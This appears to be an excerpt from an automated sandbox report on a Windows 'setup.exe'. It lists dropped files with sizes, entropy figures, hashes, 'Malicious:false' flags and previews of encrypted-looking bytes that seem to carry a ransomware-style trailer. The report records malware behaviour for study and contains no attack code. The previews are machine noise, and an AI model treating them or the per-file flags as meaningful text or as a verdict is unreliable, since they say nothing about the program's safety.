Lif.5..S..K...}.9..~pTH.7}f.A.j...p..N.p.[$Hi1..2....S...M.$F.......l...P...>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):715
              Entropy (8bit):7.696147170877356
              Encrypted:false
              SSDEEP:12:x7ru+rfrDUaJqa0wXCvu6COe+MneVRGYgwnCDeGgIVLM5naPHBV21PPQmrrV9zsV:xX1DJJqa0wyvu5Oe+0eVRLUeIVoRcHjl
              MD5:691A843B7FB1F8DEB0DEF3CE75EF9A9B
              SHA1:88EFD8AEF5CEABB8CBEB03EA34202FCFBD1CB38F
              SHA-256:626499D5B9B18DF8FFF0DE08FA9DE1D628F7838F04F1F100564586F0358E07FB
              SHA-512:E7519368361730E64C0CABF3403D1481302A0D7AD777DBA5A8B0B31FBB8D3A610112B5BB84C2820CF12C5E81C10114D3D04B777C87E5E0019682511494EEDE30
              Malicious:false
              Preview:<?xmlL.E.8...M./.@...r.....W.......q{.(d..(;.z..)...X..-]-I...!KgZ..?.~5....'.A.WzN..j.V>.....\...2..TT^Oe.;M.b....u....U....P.u..Q@{.....fcB.0......^5i..$w....R....Ll...../H..v..m.<.+..)0I.>.R..-s..78......:...:G6h........:_.m...{y.d.Y.bU.S..i.:<....=..8....N$..N....?A;.>..)..hN.IO..-Qi.D".i.......E.o..#..G$.i.%...U#.z.[..{wo=sC }....R.Q...1jz.E.l!......5.M!a.Kj........~.#f....=.....!..s....~+.V...C.o.....lE.f.*.a...hk......H..V.1..txP..N..Y..].3t].......J.M<..i.O..h..V..g.......*...EP5.."...p..S.c...........[2..q9.[.k.....3.P...Q.cG.q...8...sM8....R..u.+...TE.4.E...7.(.g...2 `.....BC.......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.855575543554447
              Encrypted:false
              SSDEEP:24:+FVfncLuXO9OfBA106SA2y5fbuHqx0AA0STOoAWr3hol0wyLUBC7mbD:+FVPc79O+jxuHqCzSod9E0p4lD
              MD5:AD10A1C547EE835F6C55C3FCDC8025E7
              SHA1:A5FB66D5AB4F0463C5CD85550FAA96C3A26748B5
              SHA-256:527CD96C793D496753C4982592D4F6D2A36A05C8222198605CE1D0FFB909C5AB
              SHA-512:1917052AF142B2D75345BF71A0244BF6A5E83C9F3DEFF42089B9C4ABE7504B805889654937F860A97B37992C6FBDBD539AFDB6047E98EC84FBF8829A223704E3
              Malicious:false
              Preview:<?xmlf......U.12.S.xhS.4.....U0r.X.9N.Z.OuV......jL.|.li....3$.].)....N...7..Y..a..:..hP...w..!D..|.cR...q.e.z...R..I0.....z:X.-.....0J]....*^.....c_...r..#..........Mq3 R..fb......./mz.".....&^..i..&:..w.okP.....n.An...&..5........N.t(..g.....8f.#.P.9.X.pY.P.0.....D-.|9 [O....d*~2.Z.....8u.%..wG.....V...X.0.".'.G...i......S~. .9.u..^.....RW.}..&.Eb..6F.S.7RK....O.E.rY...F#..P*.].x.Z...`....?.z......i.f.C.!....w)...A..n.%ojr.'_.1.....r.M.Ru.XW.<..........s..;O..eCV.b.}Z.]cW[.o...K ....j~.~@.......(..T..i..s........Qm....o1e..j.x....~!vTK..c..G.....n..L.Aq..AG...n...A~M..-.f....2.+g.....&.......L!Y....E...`)......)dJ..t6.....^......|0Y.M../=.*.~../...N.G=.-(+...C.).\.D....u.#...s.af6.'...n`.i.s.........#Wn..Ukc..../]..q..wy1n~..V`#...4p..w..I.5.....a&...41..;..g..= BY..tI.#....E.........\.Y.K.\X..c.:i.s....\..:..t.....w...]..j....&...,.u.^...J}#.. .....W-....e..hzHJh.p..O...c........e2..........|..hPc...%.&.=.M\.1.._U..p....2..y..~...S....V
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1008
              Entropy (8bit):7.798130650346315
              Encrypted:false
              SSDEEP:24:EGhFsHqm5799saK/Eh2a41YwdbjfuTgx3AbD:hhCKmp99Dya4tZmTA3aD
              MD5:B0ADDA007884FCE699128ED50FEEAB0B
              SHA1:4AEBF03113FD27AE855678026AA9D25351020E0A
              SHA-256:8C77278DDA4FBD14AC3B717F9F4AC4181FF34804C7C3894AD607E8F5D0CF2884
              SHA-512:9A444E46E40090045D118C844A1A55DA9387997F23B89ED7FD8109E42A7830ABB7567414ADDCA9C2C2BF8448D6C63BD9B01DF7AAB8BF3D20659120752EC663A6
              Malicious:false
              Preview:<?xml'9Z.....1.;.T&.U....A..2../7P.x.E..I.....;. E.MH.....h.......g:...]"..S.."(R.L..eo9gM.k.F.......?..H..a...*.:....#.t.)......F9.......|R..U...I.=.K.a......,.P..zH..5&..92Z.,..0a..M/Z.A..`.....z.tG.9..h.\..w....u.P.1c...d_..|..=./...x"...!.-..):...1...q...^...@]...y..;.....D|./.h-/W...R..}~.U.m.3?_^...W......O.m9.,V.......-_.s..T..w..Vx1..>.q.V|Wf.?..... ..S....&.VR.a......{..K..9!..0....g.x1:]..}8..CLy..S.F.XI..Ar...)wpA..\.Dx.t*.7.p....o7.*.$..W.....o..MZ.b.!..8|..&1.w....@n.X.|......u..........%.......tf5..F.......?..!..K..xN...e5y......A.i...h..oy6iV..g..U...89...1...W~.%,:.....6.m.sH..:.ee.A-1;Z..9p...0.Q....2.[..I.......a.W.I....W....8......<L.{.p.......m..4Wq.....)0x..p....@..Z%..D .cD...IXWr..pbS.'EQ6.*\.2.9..S.._.<c1..Y...0...;....R!8.\..Jj......|....Q...=...J..(...'<........weJ+je......7._.....^...Ci...Q.qUo..a...3!....b..+...d..8'..`.p.W..=T])Mq.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.676547391939826
              Encrypted:false
              SSDEEP:12:O7AsUkju7MVgFBOWjZ29poLe3eLRjkesxBMXuUoEdWZDuVxMzee7b9uC8FsgQsMS:O7AdIyOWNUoLe3eVjkzxeXunDcMz19u/
              MD5:2775337FEE519B1C086B310213424627
              SHA1:CD34583541ACA48C7402CB82A233B4788552B5C6
              SHA-256:BB5A4A8C7B62A2914D98A27BD29201A779F21D8AD5A3FDED0B80FED4B1229559
              SHA-512:F463A837D17990D3FAB2E4862B27A42895F4DEAB6FE157D9621CE9F697A643849A371A577EF8057B1C2259FC95A94E2E6F1BE05A44FDD797E263AA969037509A
              Malicious:false
              Preview:<?xml4...%S.M..EV..^K........P....'Czy79)..........x..n.b..;.B. ..hp... .J..)....).5.p..,..........=\...N."!3.8.2...p.......g..q}.:{..5.O..i.8./w,.....I%.S.....*....3Nq..."_N.0m....V..._y....Z.e.|.G....:.}....s.v.b.08.-.N..pq...C..Pw#.......}.s....S.~...pp.........5..l..d.....3z.4s..{..)x.R.'..C2..k..x..^.0.S.#....w..|.[2.o.N.P.i{..O...;.(.....IA."K>).[....:...."\...H.7..1.M.......]z...._...M.....e.I}.B....4.......Fi.]....?..56L[....f./..Bd4.0.\.O..K....".V..<..^O...t.oK...../....<.v.p....x.\.......|.#?W.....i4j.w..q.?....O..Z.?2I..x...N\y....b.7..oN...../...Y&.9......MK.6.,=....`%."t...`......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):793
              Entropy (8bit):7.691496773113602
              Encrypted:false
              SSDEEP:12:CDha7L7YdaOghodwSIXMc1o0e3Zlij1a/54OLy7P4bodTVGaDdyjKaB8NuCsMR2X:Cc7YMrodwlMci14o67rds4yjKaB0ujbD
              MD5:29F4850CB03935F77E09F83C54074AD5
              SHA1:4667F90C4A3C08E3F112532932096A5D4BDDFB6D
              SHA-256:728EF21B96797A6A67D9FC7FC079459C1D44ACAC80696E3777B2C611CFDD3E80
              SHA-512:ED71F1E472094E65BE84764F7586F178AFE7D27D38A25AA7C4A2054356C77334A50B8B929407CFF8E6A112954B630C05183FECBE2513A2035388F52CC1FF2645
              Malicious:false
              Preview:<?xml..0..P7..q..S....k<1.....T.....u.e.JV.<F......=..y..}M.*0.h3.s.3;sD....v.5OI.*P..Td....6.K!.V...n.8R.....z...?.o.....C....x.)V0..c.`.ql.V...7....,n.0.).k.).....w.:s........S..ky.Ff\.<'...w..H.,......D..........p...]...9.z......|... .8..... .@.p.....|....pQpt...h.`k-......{....V..0W.6..l...6F..F..E=s...]..<2Z.......r<.....:.F.DkRD...M4..G...L....j.0.W...........=F.[........+.:<|...b.6.... n@.0..t..mX...N9...W6.......e,.6.......m6.zFF....._|CM.Q.h..^.:....`. ^J@.'rN{....u.s}....G.0...1.E].5...M..V*...LA....5....c..3J.K...x...l.[/.B.l....L.~...g..V.k>.T...............ay.'b...e..u.7dx...R.e1..s.1p...H.B.K. 7._,l..Q.SVd..u.-.E....{!.... I..$...;......;.*X...:m8.*.....O.XVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.713100898253858
              Encrypted:false
              SSDEEP:12:SfX4KzOpIfdVFCKCVgvpVesEtENCrqDZyq8MR9vPzG4mg528+kUtvcot6OJ80/In:ktnf1JCWpmENCrqfrrK4mgV+ZUot6q/A
              MD5:F83054D2C6D7F6C7C1661F7D00593A00
              SHA1:61B14431AC5342C9E6F4915EC403873F44956051
              SHA-256:94BC24D6D55B4E7198699E5AEFE1613A74D3F667208ED4F5CCA1BFA33DC3E36A
              SHA-512:25A73D89627BB3A5C74F5162E7B2D274C84970DCEFE6CE39B7EB6FDD6EE468AF957A6DDD37198D3D7F69833CD2DB230CB0C3C5AD96ECC8AB0C2BD8EBEE8E1016
              Malicious:false
              Preview:<?xml.S.6....6Q.Q....u...nsy..?O...%....To.N....h..@.......?.(1....%...5sm.Q@......H%!.{..N6I....K%.iS.XL*.,....z|.`G..m.......o..TD.....s.t......C...~uO..l0.uJZe....a....n......4.z...S........h...6..m5O..]#."9..n..F...:...}=..l...0Er.I..Hs..7!....v..*,]W.......VK.%...$.6.[.a....@1.......p..P.wC..*U..IH...H..G.k..\[.8W.w.r!.x..'.....P...v.).....$2~9?.....%..`5...H.w....+l..x.:...P.....a..........g."..k.*..M-c.@...~m.5..H,..c..6..a.0;.g....!.........9X...n.l 5.XP...).....{w...P.....;e.7....k..z~+.....Ynl..N...8-..SG.CW..v..b.........L.v..f...k..q..,T......59..B_P...p.$..J/z.;.@>..S..2'..k..n.j...KJy...3mI..:.Wd..[L...p..j.....%.....B4X90..,.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1306
              Entropy (8bit):7.860314019805247
              Encrypted:false
              SSDEEP:24:195+khOpon2PMeNpmiAF5hEuD1uRS9lDpj1iy2NDDXd/6lqIOV+bD:19H5n2UHFL5AorDpj1RK6QIOV8D
              MD5:47632D69EDF6D951A057079F5A863E7D
              SHA1:2D816CFF119BF47BD72299E73A09DDD0C56175B4
              SHA-256:D9B8712C9FA9E51A65D4BF0BFBECBE741D29BFDA90BDC67D2ACC467FE36B959C
              SHA-512:716953CC61B3F680FDB2158B6BF6ABE95AEFE85D6148825BA3C2E774B5CEDA8829429485C4884073509B804D1A16451A390ACD514E71A33391D517C97680B530
              Malicious:false
              Preview:<?xml......N5.|..t.K.........]....}F.?.....\Jd.-..`F.^..rw..D.?.n1/.M..*........2[E.1.........tXU.~....)..._.=...n...)..e../.[..A.y.X-At.....#T.y..'.C)..H...x..k..\s.sO.A.].].Vf6.......)ARB.5....Xo.^..S...,9i....6.j.....+l.3....C;...?........W...Y.2.I.D.V..SXE!.Q.Q.......&A..".......^.W#>.9.mQE...\.)-.W.j..C.{...&..f......c._....."....U..`.....-..........m.`....r.$..#7.g...(5$.......j...5..-.=P_..?L.8...8..TCE...t.0.Q.z.z.2......f.xQ(KE...,..@...l$..yr.....bs./.~..~tl....tm....uzx7..^..>..oN=WS.u...B..).`k..2...O.n...f...y.*.W.;.b.|.B*......&[..3.&./.j..F..<..C#RW...Z9V.p..>"9}.K.Y68d$.g..)f..G....G.g...w.q.....f..l.}..,I....l...b..|......d_\.0....c.3.$..g.ae`k..h.......c......[a...r_.....4....>.#......-...5$...CF_.\0'..^r....{G$.\...M*.....g..T...(.A..p^.'.'=.)5..T?..k.,....c.`......q...i..C.....(.N_p......Jc....pb.:..M....|..8....n.!..l.q.......X.{....u...\.YE+.B....%.5.._..".pT..9.P7..VK.y..b.^..!.~j/.sG.v..Jk.....~-.../..)...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4285
              Entropy (8bit):7.950742617144995
              Encrypted:false
              SSDEEP:96:RruTSWmdePpK6zUccJtQGAkr/ZflGdrnLtQsB9p7ghbzng1w:BH6g3pL1lGdTBf7obbg1w
              MD5:F035818F3AC132AB2B754B62AD587D3A
              SHA1:2E264B7AA1DB75468C408A828BF19070824BD484
              SHA-256:4F1A171E6D7A8CE78B042E1DE5E57F85441AB687D1DA6601ADEBC27E3D23452A
              SHA-512:C400FF2DAE863C531DB4E91032E662E3AFEAB4A5D6580D00C7D61B4AA0052782995173CEF65E975BA36E31C33FEB8C9119D1E6F6558A9D46506E7F95AE6CE007
              Malicious:false
              Preview:<?xml$v.,P..LI..0|..y...`3.(.......e;.....^...b...y......v5.....*L....d%*.v.].p'..Mn[T.,......EAd..7.;...C.._?..D..a.{|...-...YP.[...o.YI,r..J.e.....1j.....|.ev.)!6..Hj.=........7..$..!...f....G..2......-V....o...U..3)"[..^..s...d./.C...v.Z...q|<....0.....(.Z..]Q........(....!z..<..&R.beP..2.CZ..}..S.Kd..........9.I1.C..v.....!._z..o...5u.....`*.._;MU.....x.........~W...Pf.[........G..k..K.g."....C......... .}.]w....").8Q..1[.....v.d.=.)&.1.!...Wx.[.>McP4..8/r..mR..........".*......7...Q_p.P.(..;.v.E...S7..b.H..)p.7....?..F;.B;5.'.F9..MNJ..FX..vGO5..l.@...=... .y.<........&....5..\..D........U'.<.=.Q...9.?.N..KB....D...n..U....w.k#.#..1..6.O....2.....,u..Y... [..`.'Q...../.J..g..L.S..&..i...9C...&.FxS[}....g..i.)q..2.....I_....._...H..T.Tw..wh...... .ru.-E.....\)..+ib.S...@..j."[$.........Y^sJ....5.f..f._...iS9...|.........J.!6..O.-."....4.BL(ycI./Y=.Q2.S.=.|.yB..-..>.b..k...[#..KR.iwj.#.;6....l...X....._O+]....(I..'..X...Z../.l+.}.j.X..~.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):7.7680282273924774
              Encrypted:false
              SSDEEP:24:EPtMXzqzwGEgxmy5bdsLVC7jkuCg3iD3KVTmYbD:EPYzqNEgxF5bdsLVCPTs3KVyCD
              MD5:79F805FE9788AC94A4158CB1B0A8BF40
              SHA1:AD9F4DECF6A5A3192236C99BD08B761CD1338841
              SHA-256:D00E4D440B0BFE9A16DBCA51161FA43D7F5A0C0A9E940C78169A1BAF497AC1AC
              SHA-512:D4F28EF1A6E60124EC946AC8FAFE8456D0B1DC060802D9BE891A6C16E224D8215C1B8CC86369EE1A8CDC15B1C59DC0A4518713ED7AAA12470A763A3CE220797E
              Malicious:false
              Preview:<?xml.S .&..F\.{1....pQ.?...G.._.....{.^.h(Z..b.p..~...t^*r(......H.v.]....pk..Y.c?.p.^.w......z............fgY &....'....f...].(_8%.........vX.]m..l%1.......UA.....r.M...Jfj..m.TY.....8u.<.>...k...........R=...Y5.Y.].........%.Z.J....l...Pa,..MCU....b..Ou.v.K............... .....j..H$i.....dF..?{.f$i.'...'.G.k...n....]......JT...>.:....K..e.k.CL4...>.".D.H-1.9.WXH.......].P..A..c.%f.SQ1...%...J.....{...M...4..h.... F..\+.........F....h*...J..G..._Cc..Xf-........}..^i..*..W=...+c...\.Q .....}.%....Ez...M..H!6...'.s.....AF.t..E;...mN=iW).^.....o\..7....V.;.].rB[x....G3=..k.......X.V}.^........!hp...yn..]..F....}\H........".?...C6..D....^gi)f....*..p).........<.......P...4.......>.....|..r.O.Jk.Z...g.*.n.H....M......(.[........z.X.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):929
              Entropy (8bit):7.816874678927643
              Encrypted:false
              SSDEEP:12:A9+BHJZR93NT4jYsgrpGEmNeNExF3XBvGiWPB5GX7bWjjpDOa5ws8Z5BppWzJsMS:A9KHJpN0MBrprzC3RWPEUjpKaT25P7bD
              MD5:6742BF30CDA61A2532F785DB24784FC2
              SHA1:E621BCD9E0BC0B47895A5281295A0D8974EEA8EB
              SHA-256:C944F28BBE4324CADE05B0FFEFAAA4869F216EA6E8E8540EABE5FF445DDFDEB5
              SHA-512:E68F9564B7DCE28BD7D18638C4DA940CE7D5A145CD7CFBA781154FC1286978C1CBAB21119017704AA337753644F1428CD6AB54DEE0AE9BC1EF2816383C2D56F4
              Malicious:false
              Preview:<?xml_.....+O..6`dNb. }..a...v......g....p(.%......Et...s..^../.....4j.....@..5..... 3sou...|...g..}1$9.e.:.&.Ts&.."...;.L..TOA....wK.L...>....j-.6COk..[...QQ9..LC.0-.>-...O:..(%Z.e+!T.......8..z..z.[|>..e...M......x......c.....8t?....)eP}.......].?AC...Q.:[..l\#.jgPoV-.E,.Y...c.iu.3TW..=...;.w....>j9.h..hY.~.&...G.....]Pr/.2#..U.f..HLi.^...+t............&.......+...`.-.O.V./....@9..........xgm.QD...c....J.K...F..[}!..x,....R...H..!s.'..-.s.6..Y.*z.'........x.c%..GF..Q<...6.;.....Kf.L.\t1W*....tQJ.=FA....p.`..L....J.`.xUI...7..2...z.,s...z.....m=K-..S..V"m..U.#f..@6..Si.,..e......:._i...x....H..^.>.9v.zb......M.@B4..P.|..r].b.'w.F.....^"...(+.....B.O......-..:..,...[..6.-f./.....&......)....Q..&H...l.X.........t...4n..?.....<..=E...&.'..m...#..Y.4.K.i.M...........%.&X..v.:..[..s...<C.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):722
              Entropy (8bit):7.7001751514430135
              Encrypted:false
              SSDEEP:12:fMkXoBr+ZvUDo3WL5kSHQmLX6WVV+AFCuAs+Y6r5O3HMbusMR2cii9a:xXFb3WL5zbX1SGlEVwM/bD
              MD5:BC77F2235000048C86707A0656B41595
              SHA1:E3D937E1E56C00A76E01775E388E9D3E947E4D7E
              SHA-256:C45286CCDAE3F4BBA22C561B51D5E209A95B5D4A1E106DF972D6E39DCAE022DF
              SHA-512:A994FA3020D18AF11BEFC808D62F1BE38214F911168B53401A98059B69DA8B60EF4B5981DFC75D91EEE859A338895B6E10B18A7F71D418E759AFCFE7C630EA7D
              Malicious:false
              Preview:<?xml;.ta.t...4../,Q..+.`..g.2....l...'I.."q..z....:-6\u...@..[.../.Z.@..%........q.1>.c.....&6....l4......4eO.M.~<=l][...o....da)L.w..rK%.?.f..............1...R.9..}_$...8u.VnE.Ki.Y..E.k.R..K,.{.#...@.p...R...i.C.U..JW.!.....f.K\.P.CsL.....i .2b.~.x...G|..?B.{E..1......U......h.*u,.k....c......#.k..\...ig|.g,...t..P/.f?<.N....._.B...G.<.....S.....L...5.....QK...)kRJ..~.:s6..-W..y...q..+o.*.}.K.~.).n .<*...e....p..a.M............P....A...x.Q........qu!J.....<.|.b.3.......U..Hp...].-.O......M.A.M.;.Z...-.h.....6...V...P'j7y..b..M.XKJ.`.y.0c..iR..,/W.t|^....$..K:.P[{.w?q.:.....)2..`L........e.9i.RTe.3....vh~$?.i9.Z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.787937847805749
              Encrypted:false
              SSDEEP:24:uo8lIbvOnee5TAoZDDPjNHngwj//jgnz510IpbD:uo82bWee53xAKXmJD
              MD5:D291C685120177BAFB53231A434A637A
              SHA1:8A8C3E76DEB4EA9E4C6A8D223B5E1DD65FB61096
              SHA-256:7AA4586496BEFAF99CD10BFD195DBA5E3C7A98A3992A5CA38EE59025516545F6
              SHA-512:76F4921804DFC47D69154A944FB46AEBC18A093453BC6D5B6948588F02D85B4229FCAD61DE025DDBF2701B998C02C7E5B310D079330A353AC917491068CEFD3A
              Malicious:false
              Preview:<?xml....).a2...`.._.1.b....<.G#.q...y..B...YR. ..T....4e.-..^}.!^8.Y]-<...$..fm.. wld-.;....n.....|1S..A..W........-~}.y...:.....H=+...VJc.{.mq.?.....L.@.....I.,v.Q}%4....=M.W...q.K.N.6..=.ov...OA.........<.H@......4."....s...F....<...!#.:d.mwJ{.......[?.......).F.\..O..|...Sv.n.1..#;.,...u.U....../....+.@&..?..?..&.n1v8-....x]...D.%.....Z8"..Kd..k.OE...j....x.6E.3N..p.^..m.U....SQe.29.8....=.8N.L...^......?Y..E.l.E.....L.n..v.._.|.F.Df...)9..E.;.{.U.....x...G..?...atdc...S.13..2.HW.l5...~.N..$vzb.....L../..~W..w..>.j.GJ..W.....mG.S#....1..}.38..g...C.8<d.).^.c.....l.I.|...4.....v....!..g-dCW......dW~E|.J.u.y;.7..........w..N5......-.n...z...6.....>+.o.......*&..a.._w......7..f'......^Hy...9B.{.....X...U"...5..?h.s..f.3S)}..d..Q..._.Z...bi......Du.l.o......f.........X.....5......W.*.o..s.VF....x..~..Q'..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1357
              Entropy (8bit):7.861733254542982
              Encrypted:false
              SSDEEP:24:LQE0Ad/ywOVczPOB3Gzrachsw+1NSnhT7Uo3SsyA3nRRkR1zobztJ5b1bbD:n0Ad6wOV4PC2fYAh7FT/n7fnRD
              MD5:C62192AE57D8252E26373BEAD4B2BE2B
              SHA1:52BF4D1EDE1D84B1059D65D36C90A0F046F1A5EF
              SHA-256:83AEB08F932836E5231B575DE3BD7C363D88B8A7D319B889375907971DF4103F
              SHA-512:FE18FE3BACABD3FB79E2EA41B76E9B0E5FAA0DA4A1ACD9B377402B104D62D50222994D4A1F7E9DBB24BDCF6030536CED61C92394DFEC6E06BDB1F68D44BDF7BD
              Malicious:false
              Preview:<?xml.j.k...C9[9...l..?.s!........P..j4.R{.F.1RS.<(5..e-p.E.X..p.RM..>.=.....G.....VJ..C........'6..._..XB.......u..O}..=...F.D.!K1...s4.Y.aM.8....<.=ubi_D....'U.%[..AM}.*....r.q/Nj...$.....d)d..`l.%]a..z.W_r.....V.\.*..a...P1..5.....q...,:..Z./...}..Q....Z....7.....3......R.U@y......qI...(.I.8....."r..~0*.2=![b.X.S(y.....,bE..V..%]2....+.......2..r3KHE.....,PK]?c.....m.S.......l|...'E_$c.}..............n.....K.l.X..+!.. .......qH.MT.z.<M..!..';...,.r .S$.".@L"..D..M.I5.P.%....".aQ;b>....A.6./..H%.........l.X%u.8:....}..W.[..(..E...>."..h...7XS........%.n.#..Ri.....vC..`be....P.%..zY3.&..!..3.&PB......f.4.Qa.sY..4..............^B.....8..Ed. ..M..{Sh.c&\..A..vr.&...u.[(e..O.0..t.L.)....<.\s.h.3.w.....Zq4.:...<.s...6..Jq...W..;{..2..x.....m.y..m..S...|."...v.|.....{2..............;.9.P....GR............~|....uT..U..<.........$...NV..F3...`{.OPf.o.c...;*D.#/.\..(...-^.i...z.O.W. ..uJ..M.V...r....;^..........?..Z.y`..:.pS..[x.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):7.775821637065375
              Encrypted:false
              SSDEEP:24:UCoMe7wNHWEqtYdud6SkwmnyIwfOBgOPaXr9N/MmrQqJbD:UCoM7tWFtYmZLgkujPgrbEmEqpD
              MD5:51316F23D032885F5969D0F7A7888AC1
              SHA1:6F4825E82A0D041192E73FA00368F034FAF6B073
              SHA-256:CDCA2CBAC2DB1EF4AC825D674377D69CDFAF75D548941ECF96052CF986FB51D9
              SHA-512:E3FD924202890575E5E01DB7EB07085F354095EA916B37859408DB4EF76824D737BB77ACB035DDA962891499CA4D0AF4F3C14E6EAD9AA249E7DC5E424B364568
              Malicious:false
              Preview:<?xmlc.......GNB..@,.4.mvNH47.#..#..nx.2.........^....rD!Y..._/|'......D.,...0..S%y..1{@.6.Y.>.}C...juC.X....?[.....@.ooU.La....U...i9.t.....&.}/m<..H..'GU.*f.....d....a.......]>W.....?C*mCs./4..c.U.r|r..sJ.)*..c.F.6....U..&.N.....:>n}..o.a.*.P.}.N."qh|...x_.n...n.!.@.q..4..%..l,.....<.i..|.T>Y...f..qp.o.K."...\k..xG.rw......T..A...NGS.G.p..E.Jm..d...dBq_......%GS}\.f..8{...M...d...a.qD#H...t.Y...'.=.xG....+.*S..T9.TRq.M.a.....f....oRhcG..\...'./..^..Y.....Il..C......S..t\...u.D30..y.Q.Xko ......H-.HA..N.d.T....X.G....r..L7...#..._Q.^.....}..5=..>..g...l.*....../}......0....bv.%'...O.k/.*$..6.F...hb.'.,.DO.0....nZ....GV.zF ....;...vu.\i...Z........+.N..To...\.+...Iuy.....3.V...`.po.+.pum..s..v.SA..l..k.E.......c..qlf...1.#..8z.1.;y&&.yP..8)y...U...?q.B...C....4.9...na.L&......;x=>..'...["[.B3......_..Gl.y..q...b.uj...(..I..D6.'....|.;.pT/i(.;.%.yW..B.8&0KA.......N.Q...d..A.j/OWVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):943
              Entropy (8bit):7.78442991827742
              Encrypted:false
              SSDEEP:12:apn9DuWsrwawTx/tM0o3r++zDW8RaRx/nKy4Lic8uM163znjEL55ICQdxrHSKUsI:amW2w3vf5Ky4Lnk73QdxDKnP9/xbD
              MD5:DC01C66C3EDC89D05C9E9CC1BA3AA11B
              SHA1:C59E2533B6366C2CA4B69D1B0F6DC28B777C72AB
              SHA-256:E6E3C09C37A67B347768AD4B8B60D7976C4E9B0228EFADDDB3FA911CFF83AC01
              SHA-512:F4B13CE8C0DF889E992CDD57CCB67A44090F5B80B15A542E50A7D58E1BA09983F9BF68EDF07886BECB83DAE5EACEB3C929C0D81C27B9D7353B879173AE4734C0
              Malicious:false
              Preview:<?xmlSWf...... @...\..a!~Q.V:........e..?0....(/."..ND=.3z{.A..."..Qr.su.._j.m....N...s..~.l.......v....`.td..Lc..;.0t..m..rK...........U..G..r*...7TG$.w..=....:3..s......p...i|....+.2..4(.../.&b.....h]1.. }.F.-.....K&[..].l7..E.7..xX..p.....Z.j%S.q.....M>M..w..=.`*....A.q...p......K...QN.5....NP.Os....n>~EK=.....h..|!....&.m.jR.PhX.Yc(l...D....N=L....7GN..b&/....^?.c.1*i!...2.....!.!0...~]..!. .&....3o.I...(.s3..u....X.m..h[..v,8W.|3i..(...t7Z^.y.J.h..=..`..||........&_..~....=yV.o.4.....l...(9TcS7...@....._...U^#.*P.>...........m..z..U...#....^Z.o..1c)@M6.\..2.j.h...U..`..|v.| .9..[.M..@..-.)..t:H..z..b. c.0.......j.../.....Q..[.W...1...Yo.....(.......s{..a.%..:.*...97.9......._'D.......A..(.(...V.7.=.....6.0X.`\...8..|..|E....k.....q.Yu.....:..q.-.....5.-I..zc=X.qm.2.!5.+...O.Xp[@..N..F.`f..&"Y.J~......Z..N5.q..C..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):7.736946639217771
              Encrypted:false
              SSDEEP:24:sXkUG1NrCDX9nj3pvN58YygwTre1lRz12zKZloly1bD:sXmCDX9rpl58Y1O8vXblD
              MD5:8C4B80EB1D85293229C4A200BE64870E
              SHA1:921BBB44E5B0DBF38C3CD35CF654C208892F7AB3
              SHA-256:7A730A7EFBDB7EE70A497856A841C98D957747F9A170B6BDF8239916AA1DEAC3
              SHA-512:9555F31AD81404A1FB3BCEC32E95FDDE5F1A11EB681921E5E0B1C4142C1969479434C969B872F7EF199C07F65535736B0402A364A4E66D7AB5EC4F6050A67A1C
              Malicious:false
